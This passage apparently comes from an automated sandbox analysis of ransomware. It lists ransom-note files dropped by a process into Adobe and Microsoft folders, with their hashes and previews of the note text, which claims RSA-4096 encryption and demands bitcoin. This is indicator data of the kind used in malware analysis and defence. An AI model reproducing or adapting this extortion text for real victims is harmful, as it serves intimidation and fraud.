                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\Setup\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\Setup\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\Setup\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):70704
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkL
                  MD5:60B3A4062ABE3EA49E6EB8911977B25E
                  SHA1:E046E8388CABEAA51B3E3FF27CE6434F2A6A0562
                  SHA-256:CFF09453B6ECB0B0E2D0852C1615A4AB6074BC5AD97C38EDC31EA82A7EF58740
                  SHA-512:90F7D4F8735F24BE3FF2CE49412BE3E2497C02A3C45D1143DEF24F1B5E8A9C03F1BFAD028ACD58403725BFB98113B65C43E5EDDCF4681F0F8B3656924579CEF5
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):609768
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCc
                  MD5:E8D2A8D45AE6681B32BED0C71800A1EA
                  SHA1:AB33C23D6A69B473CA0E6A40D194BA7AE5ACB066
                  SHA-256:CCF4C9E7968DA09FABC49BCDBAB494296C5AE1508FD69DF675C1C880D2BE8FFD
                  SHA-512:FF5109BDF2D8C4C755687F560BADBED3DEF165EDFB8B9C43C9DAB6059756C1D9FDC2C5405BBC759E14BAF1B76C5E5ABE2203CF48973F9AFB9849B20FA996FBA9
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):18873
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5u
                  MD5:ADC60E08450FC05F8E5AAAA3EB29750B
                  SHA1:3C6E978C14B69A4B4BCFA3D3996FB9A212AF25EC
                  SHA-256:A4C281C75F49278501AC118F0F51A6A296FFEEB9492DFD5B7572505734000BA0
                  SHA-512:ED9BC8B77C3A7345E13B1043C18A9287F6ABFCFD730ADA5EF0624DA8DFFC51C6BACD1709D5F7257959E6B754A0F8700A537D00DE5FEB1B76CDAACF6535A384F9
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft Help\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft Help\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft Help\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft OneDrive\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft OneDrive\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft OneDrive\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
